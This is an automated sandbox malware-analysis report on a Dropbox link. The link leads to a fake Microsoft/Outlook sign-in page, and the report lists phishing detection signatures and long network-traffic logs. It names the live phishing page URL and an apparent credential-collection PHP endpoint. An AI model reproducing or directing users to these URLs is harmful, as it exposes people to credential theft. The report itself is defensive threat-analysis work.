Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.dropbox.com/scl/fo/dypnewy032frqiop6d7gh/AGQRgoJcNqKPbhsYQheP8nM?rlkey=t6ozmhhbporfamqnz8ddx2in0&st=r8w1wv0v&dl=0

Overview

General Information

Sample URL:https://www.dropbox.com/scl/fo/dypnewy032frqiop6d7gh/AGQRgoJcNqKPbhsYQheP8nM?rlkey=t6ozmhhbporfamqnz8ddx2in0&st=r8w1wv0v&dl=0
Analysis ID:1510150

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
HTML page contains hidden URLs
Phishing site detected (based on favicon image match)
Phishing site detected (based on image similarity)
Detected hidden input values containing email addresses (often used in phishing pages)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Invalid 'forgot password' link found
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 1348 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.dropbox.com/scl/fo/dypnewy032frqiop6d7gh/AGQRgoJcNqKPbhsYQheP8nM?rlkey=t6ozmhhbporfamqnz8ddx2in0&st=r8w1wv0v&dl=0 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 2344 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1952,i,11583982541712722701,1603866110619100737,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.htmlLLM: Score: 0 Reasons: The domain 'pub-03a94b366f924d73997765875d0e6b81.r2.dev' does not match the legitimate domain associated with Microsoft, which is'microsoft.com'. The presence of the 'dev' top level domain and the 'pub' subdomain suggests that this is a development environment, possibly for testing or internal use, rather than a legitimate Microsoft webpage. DOM: 276.5.pages.csv
Source: https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.htmlHTTP Parser: https://cmowunfermlndorminantckrewzoo.lol/GARCIA/dcdf4a8.php
Source: https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.htmlMatcher: Template: microsoft matched with high similarity
Source: https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.htmlMatcher: Found strong image similarity, brand: MICROSOFT
Source: https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.htmlHTTP Parser: notreal@nicetry.com
Source: https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.htmlHTTP Parser: Number of links: 0
Source: https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.htmlHTTP Parser: Total embedded image size: 31111
Source: https://www.dropbox.com/scl/fo/dypnewy032frqiop6d7gh/AGQRgoJcNqKPbhsYQheP8nM?rlkey=t6ozmhhbporfamqnz8ddx2in0&st=r8w1wv0v&dl=0HTTP Parser: Base64 decoded: '%previews_mobile_web_redesign_facepile
Source: https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.htmlHTTP Parser: Title: Sign in to Outlook does not match URL
Source: https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.htmlHTTP Parser: Invalid link: Forgot my password
Source: https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.htmlHTTP Parser: <input type="password" .../> found
Source: https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.htmlHTTP Parser: No favicon
Source: https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.htmlHTTP Parser: No <meta name="author".. found
Source: https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.htmlHTTP Parser: No <meta name="author".. found
Source: https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.htmlHTTP Parser: No <meta name="copyright".. found
Source: https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.htmlHTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.18:49833 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.18:62247 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.159.75:443 -> 192.168.2.18:62292 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.209.178:443 -> 192.168.2.18:62383 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.18:62233 -> 162.159.36.2:53
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
Source: global trafficDNS traffic detected: DNS query: cfl.dropboxstatic.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: uc5a1b9bcddbfdcf24f27aa76912.previews.dropboxusercontent.com
Source: global trafficDNS traffic detected: DNS query: fp.dropbox.com
Source: global trafficDNS traffic detected: DNS query: use1-turn.fpjs.io
Source: global trafficDNS traffic detected: DNS query: google.com
Source: global trafficDNS traffic detected: DNS query: uce3be385a7bf3e7836869b0a870.previews.dropboxusercontent.com
Source: global trafficDNS traffic detected: DNS query: beacon.dropbox.com
Source: global trafficDNS traffic detected: DNS query: www.dropboxstatic.com
Source: global trafficDNS traffic detected: DNS query: pub-03a94b366f924d73997765875d0e6b81.r2.dev
Source: global trafficDNS traffic detected: DNS query: cmowunfermlndorminantckrewzoo.lol
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 62733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 62756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62567 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 62538 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62292
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62585 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62609
Source: unknownNetwork traffic detected: HTTP traffic on port 62629 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62642 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62579 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62724
Source: unknownNetwork traffic detected: HTTP traffic on port 62533 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62285
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62487 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 62561 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62612
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62613
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62614
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62615
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62736
Source: unknownNetwork traffic detected: HTTP traffic on port 62767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62616
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62739
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62597 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62574 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62337 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62610
Source: unknownNetwork traffic detected: HTTP traffic on port 62612 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62611
Source: unknownNetwork traffic detected: HTTP traffic on port 62566 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62453 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62235 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62362 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62744
Source: unknownNetwork traffic detected: HTTP traffic on port 62580 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62506
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62629
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62322 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62614 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62285 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62560 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62594
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62234
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62597
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62235
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62598
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62554 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62362
Source: unknownNetwork traffic detected: HTTP traffic on port 62575 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62487
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62247
Source: unknownNetwork traffic detected: HTTP traffic on port 62741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 62542 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 62565 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62383
Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
